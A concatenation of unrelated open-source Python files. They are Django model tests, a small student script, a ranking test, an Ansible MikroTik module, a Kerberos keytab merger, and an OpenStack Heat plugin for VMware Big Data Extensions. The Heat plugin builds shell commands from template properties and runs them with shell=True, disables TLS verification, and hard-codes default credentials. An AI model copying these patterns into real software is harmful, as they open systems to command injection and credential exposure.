added_book_sixth = AddedBook.objects.get(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book'))
added_book_third.delete()
added_book_sixth.delete()
self.assertEqual(AddedBook.objects.all().count(), 6)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Third Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book')).count(), 0)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_get_user_added_book(self):
"""
        Must generate the list of books added by the user (i.e. the books the user is reading).
"""
self.assertTrue(self.anonymous_user.is_anonymous)
self.assertEqual(len(AddedBook.get_user_added_books(self.anonymous_user)), 0)
self.assertEqual(AddedBook.get_user_added_books(self.anonymous_user), [])
self.assertEqual(AddedBook.get_user_added_books(self.the_user1.id_user).count(), 3)
self.assertEqual(AddedBook.get_user_added_books(self.the_user5.id_user).count(), 1)
self.assertNotEqual(AddedBook.get_user_added_books(self.the_user1.id_user), [])
removed_obj = AddedBook.objects.get(id_book=Book.objects.get(book_name='Sixth Book'),
id_user=self.the_user5)
removed_obj.delete()
self.assertEqual(AddedBook.get_user_added_books(self.the_user5.id_user).count(), 0)
self.assertNotEqual(AddedBook.get_user_added_books(self.the_user5.id_user), [])
# ------------------------------------------------------------------------------------------------------------------
def test_get_count_added(self):
"""
        Must return the count of how many users are reading a given book.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
not_existing_id = 10000
self.assertEqual(AddedBook.get_count_added(third_book.id), 2)
self.assertEqual(AddedBook.get_count_added(sixth_book.id), 4)
self.assertEqual(AddedBook.get_count_added(not_existing_id), 0)
removed_third = AddedBook.objects.filter(id_user=self.the_user1, id_book=third_book)
removed_third.delete()
removed_sixth = AddedBook.objects.filter(id_user=self.the_user1, id_book=sixth_book)
removed_sixth.delete()
self.assertEqual(AddedBook.get_count_added(third_book.id), 1)
self.assertEqual(AddedBook.get_count_added(sixth_book.id), 3)
self.assertEqual(AddedBook.get_count_added(not_existing_id), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_book_rating(self):
self.assertEqual(BookRating.objects.all().count(), 6)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.filter(book_name='Third Book')).count(), 3)
self.assertEqual(BookRating.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(BookRating.objects.filter(id_user=self.the_user2).count(), 2)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 2)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user1).count(), 1)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user6).count(), 0)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user1,
rating=7).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_changed_book_rating(self):
removed_rating = BookRating.objects.get(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user1)
removed_rating.delete()
self.assertEqual(BookRating.objects.all().count(), 5)
changed_rating1 = BookRating.objects.get(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user2)
changed_rating2 = BookRating.objects.get(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user1)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 2)
self.assertEqual(changed_rating1.rating, 7)
self.assertEqual(changed_rating2.rating, 7)
changed_rating1.rating = 4
changed_rating1.save()
changed_rating2.rating = 3
changed_rating2.save()
self.assertEqual(changed_rating1.rating, 4)
self.assertEqual(changed_rating2.rating, 3)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 0)
self.assertEqual(BookRating.objects.filter(rating=4).count(), 2)
self.assertEqual(BookRating.objects.filter(rating=3).count(), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_book_comment(self):
self.assertEqual(BookComment.objects.all().count(), 5)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book')).count(), 2)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Fourth Book')).count(), 2)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 0)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user6).count(), 0)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1).count(), 1)
BookComment.objects.create(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1,
text='New comment user1 book 2')
self.assertEqual(BookComment.objects.all().count(), 6)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user1).count(), 4)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book')).count(), 3)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1).count(), 2)
deleted_comment = BookComment.objects.get(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user5)
deleted_comment.delete()
self.assertEqual(BookComment.objects.all().count(), 5)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user5).count(), 0)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Fourth Book')).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_post_messages(self):
self.assertEqual(Post.objects.all().count(), 3)
self.assertEqual(Post.objects.filter(user=self.the_user1).count(), 2)
self.assertEqual(Post.objects.filter(user=self.the_user2).count(), 1)
deleted_post = Post.objects.get(user=self.the_user1, heading='post 2')
deleted_post.delete()
self.assertEqual(Post.objects.all().count(), 2)
self.assertEqual(Post.objects.filter(user=self.the_user1).count(), 1)
self.assertEqual(Post.objects.filter(user=self.the_user2).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_support_messages(self):
self.assertEqual(SupportMessage.objects.all().count(), 4)
self.assertEqual(SupportMessage.objects.filter(email='[email protected]').count(), 2)
self.assertEqual(SupportMessage.objects.filter(email='[email protected]').count(), 1)
self.assertEqual(SupportMessage.objects.filter(is_checked=False).count(), 4)
checked_message = SupportMessage.objects.get(email='[email protected]', text='Test text1')
checked_message.is_checked = True
checked_message.save()
self.assertEqual(SupportMessage.objects.filter(is_checked=False).count(), 3)
# ------------------------------------------------------------------------------------------------------------------
def tearDown(self):
for book in Book.objects.all():
if os.path.exists(book.book_file.path):
os.remove(book.book_file.path)
if book.photo and os.path.exists(book.photo.path):
os.remove(book.photo.path)
| OlegKlimenko/Plamber | app/tests/test_models.py | Python | apache-2.0 | 53,921 |
# Task 5. Variant 6.
# Write a program that, when run, randomly displays the name of one of the two moons of Mars.
# Velyan A. S.
# 27.05.2016
print("\nThe name of one of the two moons of Mars:")
import random
satellite=["Фобос", "Деймос"]
s=random.choice(satellite)
print(s)
input("Press Enter to exit") | Mariaanisimova/pythonintask | PMIa/2015/Velyan_A_S/task_5_6.py | Python | apache-2.0 | 503 |
def test_signal_wikidata_url(ranker):
rank = lambda url: ranker.client.get_signal_value_from_url("wikidata_url", url)
assert rank("http://www.douglasadams.com") > 0.5
assert rank("http://www.douglasadams.com/?a=b") > 0.5
assert rank("http://www.douglasadams.com/page2") == 0. # TODO, check domain?
assert rank("http://www.paulherbert.com/") == 0.
| commonsearch/cosr-back | tests/cosrlibtests/signals/test_wikidata.py | Python | apache-2.0 | 370 |
# -*- coding: utf-8 -*-
DOCUMENTATION = '''
module: mt_system.py
author:
- "Valentin Gurmeza"
version_added: "2.4"
short_description: Manage mikrotik system endpoints
requirements:
- mt_api
description:
- manage mikrotik system parameters
options:
hostname:
description:
      - hostname of the mikrotik router
required: True
username:
description:
- username used to connect to mikrotik router
required: True
password:
description:
- password used for authentication to mikrotik router
required: True
parameter:
description:
      - sub endpoint for mikrotik system
required: True
options:
- ntp_client
- clock
- logging
      - routerboard_settings
- identity
settings:
description:
- All Mikrotik compatible parameters for this particular endpoint.
Any yes/no values must be enclosed in double quotes
state:
description:
- absent or present
'''
EXAMPLES = '''
- mt_system:
hostname: "{{ inventory_hostname }}"
username: "{{ mt_user }}"
password: "{{ mt_pass }}"
parameter: identity
settings:
name: test_ansible
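
# A second, illustrative example: pointing the RouterOS NTP client at a server.
# The keys under 'settings' are passed straight through to the router, and the
# values shown here are assumptions rather than a tested configuration.
- mt_system:
    hostname: "{{ inventory_hostname }}"
    username: "{{ mt_user }}"
    password: "{{ mt_pass }}"
    parameter: ntp_client
    settings:
      enabled: "yes"
      primary-ntp: 192.168.1.1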
'''
from ansible.module_utils.mt_common import clean_params, MikrotikIdempotent
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
argument_spec = dict(
hostname = dict(required=True),
username = dict(required=True),
password = dict(required=True, no_log=True),
settings = dict(required=False, type='dict'),
parameter = dict(
required = True,
choices = ['ntp_client', 'clock', 'identity', 'logging', 'routerboard_settings'],
type = 'str'
),
state = dict(
required = False,
choices = ['present', 'absent'],
type = 'str'
),
),
supports_check_mode=True
)
params = module.params
if params['parameter'] == 'routerboard_settings':
params['parameter'] = 'routerboard/settings'
if params['parameter'] == 'ntp_client':
params['parameter'] = 'ntp/client'
clean_params(params['settings'])
mt_obj = MikrotikIdempotent(
hostname = params['hostname'],
username = params['username'],
password = params['password'],
state = params['state'],
desired_params = params['settings'],
idempotent_param= None,
api_path = '/system/' + params['parameter'],
check_mode = module.check_mode
)
mt_obj.sync_state()
if mt_obj.failed:
module.fail_json(
msg = mt_obj.failed_msg
)
elif mt_obj.changed:
module.exit_json(
failed=False,
changed=True,
msg=mt_obj.changed_msg,
diff={ "prepared": {
"old": mt_obj.old_params,
"new": mt_obj.new_params,
}},
)
else:
module.exit_json(
failed=False,
changed=False,
#msg='',
msg=params['settings'],
)
if __name__ == '__main__':
main()
| zahodi/ansible-mikrotik | library/mt_system.py | Python | apache-2.0 | 2,989 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple utility to merge multiple Kerberos keytabs into one.
This also cleans out duplicate and old keytab entries.
"""
import functools
import struct
# from http://pig.made-it.com/kerberos-etypes.html
ETYPES = {
1: 'des-cbc-crc',
2: 'des-cbc-md4',
3: 'des-cbc-md5',
4: None,
5: 'des3-cbc-md5',
6: None,
7: 'des3-cbc-sha1',
9: 'dsaWithSHA1-CmsOID',
10: 'md5WithRSAEncryption-CmsOID',
11: 'sha1WithRSAEncryption-CmsOID',
12: 'rs2CBC-EnvOID',
13: 'rsaEncryption-EnvOID',
14: 'rsaES-OAEP-ENV-OID',
15: 'des-ede3-cbc-Env-OID',
16: 'des3-cbc-sha1-kd',
17: 'aes128-cts-hmac-sha1-96',
18: 'aes256-cts-hmac-sha1-96',
23: 'rc4-hmac',
24: 'rc4-hmac-exp',
65: 'subkey-experimental',
}
NTYPES = {
1: 'KRB5_NT_PRINCIPAL',
2: 'KRB5_NT_SRV_INST',
3: 'KRB5_NT_SRV_HST',
4: 'KRB5_NT_SRV_XHST',
5: 'KRB5_NT_UID',
6: 'KRB5_NT_X500_PRINCIPAL',
7: 'KRB5_NT_SMTP_NAME',
10: 'KRB5_NT_ENTERPRISE_PRINCIPAL',
11: 'KRB5_NT_WELLKNOWN',
4294967166: 'KRB5_NT_ENT_PRINCIPAL_AND_ID',
4294967167: 'KRB5_NT_MS_PRINCIPAL_AND_ID',
4294967168: 'KRB5_NT_MS_PRINCIPAL',
}
class KeytabEntry(object):
"""An entry in the Keytab."""
def __init__(self, data=None):
self._data = data
self._size = len(data)
self._realm = None
self._components = []
self._name_type = None
self._timestamp = None
self._vno8 = None
self._key = None
self._vno = None
self._i = 0
if data:
self._parse()
def __base_check(self, other):
if (self.name != other.name or
self.realm != other.realm or
self.keyblock['type'] != other.keyblock['type']):
return False
return True
def __eq__(self, other):
if not isinstance(other, KeytabEntry):
return NotImplemented
if self._data:
            return self._data == other._data
return False
def __hash__(self):
return self._data.__hash__()
def __str__(self):
return '%s@%s/%s VNO:%d' % (self.name, self._realm, self.key_type,
self.vno)
def __repr__(self):
return self.__str__()
# The use of properties is mainly to reinforce that this is read-only
@property
def vno(self):
return self._vno or self._vno8
@property
def realm(self):
return self._realm
@property
def timestamp(self):
return self._timestamp
@property
def name(self):
return '/'.join(self._components)
@property
def name_type(self):
return NTYPES.get(self._name_type, self._name_type)
@property
def key(self):
return self._key['key']
@property
def key_type(self):
return ETYPES.get(self._key['type'], self._key['type'])
@property
def ts(self):
return self._timestamp
def loads(self, data):
self._data = data
self._size = len(data)
self._parse()
def _encode_size(self):
return struct.pack('!i', self._size)
def dumps(self):
value = struct.pack('!i', self._size) + self._data
return value
def _unpack(self, fmt, size):
value = struct.unpack(fmt, self._data[self._i:self._i + size])
self._i += size
return value[0]
def _uint8(self):
n = self._unpack('!B', 1)
return n
def _uint16(self):
n = self._unpack('!H', 2)
return n
def _int32(self):
n = self._unpack('!i', 4)
return n
def _uint32(self):
n = self._unpack('!I', 4)
return n
def _counted_octet_string(self):
size = self._uint16()
counted_string = self._unpack('!%ds' % size, size)
return counted_string
def _keyblock(self):
key = {
'type': self._uint16(),
'key': self._counted_octet_string()
}
return key
def _parse(self):
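        # Layout of a 0x502 keytab entry (MIT krb5 keytab format), which the
        # readers below walk through in order:
        #   uint16                number of principal components
        #   counted_octet_string  realm
        #   counted_octet_string  component (repeated per component)
        #   uint32                name type
        #   uint32                timestamp
        #   uint8                 key version (vno8)
        #   keyblock              uint16 enctype + counted_octet_string key
        #   uint32                full vno (optional trailing field)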
self._i = 0
n_components = self._uint16()
self._realm = self._counted_octet_string()
for i in range(n_components):
self._components.append(self._counted_octet_string())
self._name_type = self._uint32()
self._timestamp = self._uint32()
self._vno8 = self._uint8()
self._key = self._keyblock()
# special case. may not be present
if self._size - self._i >= 4:
self._vno = self._uint32()
class Keytab(object):
def __init__(self, f=None):
self.entries = {}
self.format_version = None
if f:
self.load(f)
def load(self, f):
entries = set()
format_version = struct.unpack('!H', f.read(2))[0]
if format_version != 0x502:
raise Exception("Unsupport file format %x" % format_version)
self.format_version = format_version
size_packed = f.read(4)
while size_packed != '':
size = struct.unpack('!i', size_packed)[0]
if size > 0:
entries.add(KeytabEntry(f.read(size)))
else:
f.read(-size)
size_packed = f.read(4)
self.add_entries(entries)
def add_entry(self, entry):
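        # Entries are keyed by realm -> principal name -> enctype; when a duplicate
        # key arrives, the entry with the higher key version number (vno) wins,
        # which is how stale keytab entries are dropped during a merge.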
r = self.entries.setdefault(entry.realm, {})
n = r.setdefault(entry.name, {})
if entry.key_type in n:
old_entry = n[entry.key_type]
if entry.vno > old_entry.vno:
self.entries[entry.realm][entry.name][entry.key_type] = entry
else:
n[entry.key_type] = entry
def add_entries(self, entries):
for e in entries:
self.add_entry(e)
def save(self, f):
f.write(struct.pack('!H', 0x502))
for e in self.entry_list():
f.write(e.dumps())
def entry_list(self):
entries = []
for realm in self.entries:
for name in self.entries[realm]:
for keytype in self.entries[realm][name]:
entries.append(self.entries[realm][name][keytype])
return entries
def main(main_args):
merged_keytab = Keytab()
for f in main_args.keytabs:
merged_keytab.add_entries(Keytab(f).entry_list())
f.close()
outfile = open(main_args.outfile, 'w')
merged_keytab.save(outfile)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Merge keytabs')
parser.add_argument('keytabs', metavar='ktfile', type=file, nargs='+',
help='a kerberos keytab to read in')
parser.add_argument('-o', '--outfile', dest='outfile', type=str,
help='output file')
args = parser.parse_args()
main(args)
| blaedd/miscutils | ktmerge/ktmerge.py | Python | apache-2.0 | 6,839 |
#!/usr/bin/python
#
# OpenStack Heat Plugin for interfacing with VMware Big Data Extensions
#
# Chris Mutchler - [email protected]
# http://www.VirtualElephant.com
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import json
import base64
import requests
import subprocess
import pyVmomi
from pyVim import connect
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vmodl, vim
from heat.engine import constraints, properties, resource
from heat.openstack.common import log as logging
from neutronclient.neutron import client
logger = logging.getLogger(__name__)
class BigDataExtensions(resource.Resource):
PROPERTIES = (
BDE_ENDPOINT, VCM_SERVER, USERNAME, PASSWORD,
CLUSTER_NAME, CLUSTER_TYPE, NETWORK, CLUSTER_PASSWORD, CLUSTER_RP,
VIO_CONFIG, BDE_CONFIG, SECURITY_GROUP, SUBNET
) = (
'bde_endpoint', 'vcm_server', 'username', 'password',
'cluster_name', 'cluster_type', 'network', 'cluster_password', 'cluster_rp',
'vio_config', 'bde_config', 'security_group', 'subnet'
)
properties_schema = {
BDE_ENDPOINT: properties.Schema(
properties.Schema.STRING,
required=True,
default='bde.localdomain'
),
VCM_SERVER: properties.Schema(
properties.Schema.STRING,
required=True,
default='vcenter.localdomain'
),
USERNAME: properties.Schema(
properties.Schema.STRING,
required=True,
default='[email protected]'
),
PASSWORD: properties.Schema(
properties.Schema.STRING,
required=True,
default='password'
),
CLUSTER_NAME: properties.Schema(
properties.Schema.STRING,
required=True
),
CLUSTER_TYPE: properties.Schema(
properties.Schema.STRING,
required=True
),
NETWORK: properties.Schema(
properties.Schema.STRING,
required=True
),
CLUSTER_PASSWORD: properties.Schema(
properties.Schema.STRING,
required=False
),
CLUSTER_RP: properties.Schema(
properties.Schema.STRING,
required=True,
default='openstackRP'
),
VIO_CONFIG: properties.Schema(
properties.Schema.STRING,
required=True,
default='/usr/local/bin/etc/vio.config'
),
BDE_CONFIG: properties.Schema(
properties.Schema.STRING,
required=False,
default='/usr/local/bin/etc/bde.config'
),
SECURITY_GROUP: properties.Schema(
properties.Schema.STRING,
required=False,
default='9d3ecec8-e0e3-4088-8c71-8c35cd67dd8b'
),
SUBNET: properties.Schema(
properties.Schema.STRING,
required=True
)
}
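    # A sketch of how this resource might be declared in a HOT template. The
    # resource type name is assumed from the log prefix used in this plugin;
    # the authoritative name comes from the plugin's resource_mapping()
    # registration, and the property values below are purely illustrative.
    #
    #   hadoop_cluster:
    #     type: VirtualElephant::VMware::BDE
    #     properties:
    #       cluster_name: heat-hadoop01
    #       cluster_type: hadoop
    #       network: heat-mgmt-net
    #       subnet: heat-mgmt-subnet
    #       cluster_password: changeme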
def _open_connection(self):
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
header = {'content-type': 'application/x-www-form-urlencoded'}
prefix = 'https://'
port = ':8443'
auth_string = "/serengeti/j_spring_security_check"
data = 'j_username=' + bde_user + '&j_password=' + bde_pass
s = requests.session()
url = prefix + bde_server + port + auth_string
r = s.post(url, data, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Authentication status code %s") % r.json)
return s
def _close_connection(self):
bde_server = self.properties.get(self.BDE_ENDPOINT)
header = {'content-type': 'application/x-www-form-urlencoded'}
url = 'https://' + bde_server + ':8443/serengeti/j_spring_security_logout'
s = requests.session()
r = s.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Log out status code %s") % r.json)
return
def _create_nsx_ports(self):
# Load VIO environment variables from /usr/local/etc/vio.config
in_file = "/usr/local/etc/vio.config"
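        # The config file is expected to look like a standard OpenStack RC file,
        # one KEY=value pair per line (values here are illustrative):
        #   OS_AUTH_URL=https://vio.localdomain:5000/v2.0
        #   OS_TENANT_ID=<tenant uuid>
        #   OS_TENANT_NAME=demo
        #   OS_USERNAME=admin
        #   OS_PASSWORD=secret
        #   OS_URL=https://vio.localdomain:9696
        #   OS_TOKEN=<keystone token>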
f = open(in_file, "ro")
for line in f:
if "OS_AUTH_URL" in line:
trash, os_auth_url = map(str, line.split("="))
os_auth_url = os_auth_url.rstrip('\n')
logger.info(_("VirtualElephant::VMware::BDE - DEBUG os_auth_url %s") % os_auth_url)
elif "OS_TENANT_ID" in line:
trash, os_tenant_id = map(str,line.split("="))
os_tenant_id = os_tenant_id.rstrip('\n')
elif "OS_TENANT_NAME" in line:
trash, os_tenant_name = map(str, line.split("="))
os_tenant_name = os_tenant_name.rstrip('\n')
elif "OS_USERNAME" in line:
trash, os_username = map(str, line.split("="))
os_username = os_username.rstrip('\n')
elif "OS_PASSWORD" in line:
trash, os_password = map(str, line.split("="))
os_password = os_password.rstrip('\n')
elif "OS_URL" in line:
trash, os_url = map(str, line.split("="))
os_url = os_url.rstrip('\n')
elif "OS_TOKEN" in line:
trash, os_token = map(str, line.split("="))
os_token = os_token.rstrip('\n')
d = {}
d['username'] = os_username
d['password'] = os_password
d['auth_url'] = os_auth_url
d['tenant_name'] = os_tenant_name
d['token'] = os_token
d['url'] = os_url
logger.info(_("VirtualElephant::VMware::BDE - Loaded VIO credentials - %s") % d)
# Using BDE API and vSphere API return the MAC address
# for the virtual machines created by BDE.
bde_server = self.properties.get(self.BDE_ENDPOINT)
vcm_server = self.properties.get(self.VCM_SERVER)
admin_user = self.properties.get(self.USERNAME)
admin_pass = self.properties.get(self.PASSWORD)
cluster_name = self.properties.get(self.CLUSTER_NAME)
network_id = self.properties.get(self.NETWORK)
security_group = self.properties.get(self.SECURITY_GROUP)
prefix = 'https://'
port = ':8443'
logger.info(_("VirtualElephant::VMware::BDE - Creating NSX ports for network %s") % network_id)
# Get the node names for the cluster from BDE
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + cluster_name
url = prefix + bde_server + port + api_call
r = curr.get(url, headers=header, verify=False)
raw_json = json.loads(r.text)
cluster_data = raw_json["nodeGroups"]
# Open connect to the vSphere API
si = SmartConnect(host=vcm_server, user=admin_user, pwd=admin_pass, port=443)
search_index = si.content.searchIndex
root_folder = si.content.rootFolder
for ng in cluster_data:
nodes = ng["instances"]
for node in nodes:
logger.info(_("VirtualElephant::VMware::BDE - Creating NSX port for %s") % node.get("name"))
vm_name = node.get("name")
vm_moId = node.get("moId")
port_name = vm_name + "-port0"
# moId is not in format we need to match
(x,y,z) = vm_moId.split(":")
vm_moId = "'vim." + y + ":" + z + "'"
# Go through each DC one at a time, in case there are multiple in vCenter
for dc in root_folder.childEntity:
content = si.content
objView = content.viewManager.CreateContainerView(dc, [vim.VirtualMachine], True)
vm_list = objView.view
objView.Destroy()
for instance in vm_list:
# convert object to string so we can search
i = str(instance.summary.vm)
if vm_moId in i:
# Matched the VM in BDE and vCenter
logger.info(_("VirtualElephant::VMware::BDE - Match found for BDE node %s") % instance)
for device in instance.config.hardware.device:
if isinstance(device, vim.vm.device.VirtualEthernetCard):
mac_address = str(device.macAddress)
logger.info(_("VirtualElephant::VMware::BDE - Found MAC address %s") % mac_address)
# If the node is already trying to get an IP address,
# then a powercycle is required.
#logger.info(_("VirtualElephant::VMware::BDE - Powercycling the node %s") % node.get("name"))
#if instance.runtime.powerState == vim.VirtualMachinePowerState.poweredOn:
# task = instance.PowerOff()
# while task.info.state not in [vim.TaskInfo.State.success,
# vim.TaskInfo.State.error]:
# logger.info(_("VirtualElephant::VMware::BDE - Waiting for node power off %s") % node.get("name"))
# time.sleep(5)
# task = instance.PowerOn()
# while task.info.state not in [vim.TaskInfo.State.success,
# vim.TaskInfo.State.error]:
# logger.info(_("VirtualElephant::VMware::BDE - Waiting for node power on %s") % node.get("name"))
# time.sleep(5)
# Create a new port through Neutron
neutron = client.Client('2.0',
username=os_username,
password=os_password,
auth_url=os_auth_url,
tenant_name=os_tenant_name,
endpoint_url=os_url,
token=os_token)
port_info = {
"port": {
"admin_state_up": True,
"device_id": vm_name,
"name": port_name,
"mac_address": mac_address,
"network_id": network_id
}
}
logger.info(_("VirtualElephant::VMware::BDE - Neutron port string %s") % port_info)
response = neutron.create_port(body=port_info)
logger.info(_("VirtualElephant::VMware::BDE - NSX port creation response - %s") % response)
return
def handle_create(self):
# REST API call to create a new VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
vcm_server = self.properties.get(self.VCM_SERVER)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
distro = self.properties.get(self.CLUSTER_TYPE)
clusterName = self.properties.get(self.CLUSTER_NAME)
network = self.properties.get(self.NETWORK)
rp = self.properties.get(self.CLUSTER_RP)
prefix = 'https://'
port = ':8443'
        # hack: Heat sends this call before the NSX network is created/assigned
        #time.sleep(60)
        # determine the actual NSX portgroup that was created
        # hack: shell out to curl/grep/awk instead of parsing the MOB page in Python
mob_string = '/mob/?moid=datacenter-2'
curl_cmd = 'curl -k -u ' + bde_user + ':' + bde_pass + ' ' + prefix + vcm_server + mob_string
grep_cmd = " | grep -oP '(?<=\(vxw).*(?=" + network + "\))' | grep -oE '[^\(]+$'"
awk_cmd = " | awk '{print $0 \"" + network + "\"}'"
full_cmd = curl_cmd + grep_cmd + awk_cmd
p = subprocess.Popen(full_cmd, stdout=subprocess.PIPE, shell=True)
(net_uid, err) = p.communicate()
# Check to see if network_id is as we expect it
if 'vxw' in net_uid:
network_id = net_uid
else:
network_id = "vxw" + net_uid
network_id = network_id.rstrip('\n')
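        # NOTE: a pure-Python alternative to the curl/grep/awk pipeline above is
        # sketched here (assumptions: requests and re are available, the vCenter
        # MOB page lists the portgroup as "vxw-...-<network>", and the MOB accepts
        # basic auth with the BDE credentials):
        #
        #   import re, requests
        #   mob_url = prefix + vcm_server + mob_string
        #   page = requests.get(mob_url, auth=(bde_user, bde_pass), verify=False).text
        #   match = re.search(r'(vxw[^"\'<>]*' + re.escape(network) + r')', page)
        #   network_id = match.group(1) if match else network
        #
        # This is only a sketch, not the plugin's implementation.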
# Authenticate in a requests.session to the BDE server
curr = self._open_connection()
        # TODO: should check whether the network already exists as an available network.
        # BDE logs a big error message in /opt/serengeti/logs/serengeti.log
        # when the network doesn't exist.
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/network/' + network
url = prefix + bde_server + port + api_call
r = curr.get(url, headers=header, verify=False)
# Add new network to BDE as an available network if check fails
payload = {"name" : network, "portGroup" : network_id, "isDhcp" : "true"}
api_call = '/serengeti/api/networks'
url = prefix + bde_server + port + api_call
r = curr.post(url, data=json.dumps(payload), headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Network creation status code %s") % r.json)
# Send the create cluster REST API call
payload = {"name": clusterName, "distro": distro, "rpNames": [rp], "networkConfig": { "MGT_NETWORK": [network]}}
api_call = '/serengeti/api/clusters'
url = prefix + bde_server + port + api_call
r = curr.post(url, data=json.dumps(payload), headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Create cluster status code %s") % r.json)
# Arbitrary sleep value to allow for the nodes to be cloned
sleep = 180
logger.info(_("VirtualElephant::VMware::BDE - Sleeping for %s seconds BDE to create nodes") % sleep)
time.sleep(sleep)
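        # NOTE: the fixed sleep above is arbitrary; a more robust approach would be
        # to poll BDE until the cluster reaches a terminal state. A rough sketch
        # (the exact status field and values are assumptions about the Serengeti API):
        #
        #   status_url = prefix + bde_server + port + '/serengeti/api/cluster/' + clusterName
        #   for _ in range(60):
        #       status = curr.get(status_url, headers=header, verify=False).json().get("status")
        #       if status in ("RUNNING", "PROVISION_ERROR"):
        #           break
        #       time.sleep(10)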
# Create ports for the BDE nodes on the NSX logical router
nsx = self._create_nsx_ports()
term = self._close_connection()
return
def handle_suspend(self):
# REST API call to shutdown an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
state = 'stop'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name + '?state=' + state
url = prefix + bde_server + port + api_call
r = curr.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Stop cluster status code %s") % r.json)
term = self._close_connection()
return
def handle_resume(self):
# REST API call to startup an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
state = 'start'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name + '?state=' + state
url = prefix + bde_server + port + api_call
r = curr.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Start cluster status code %s") % r.json)
term = self._close_connection()
return
def handle_delete(self):
# REST API call to delete an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name
url = prefix + bde_server + port + api_call
r = curr.delete(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Delete cluster status code %s") % r.json)
# Need to delete the NSX ports for clean-up
term = self._close_connection()
return
def resource_mapping():
return { 'VirtualElephant::VMware::BDE': BigDataExtensions }
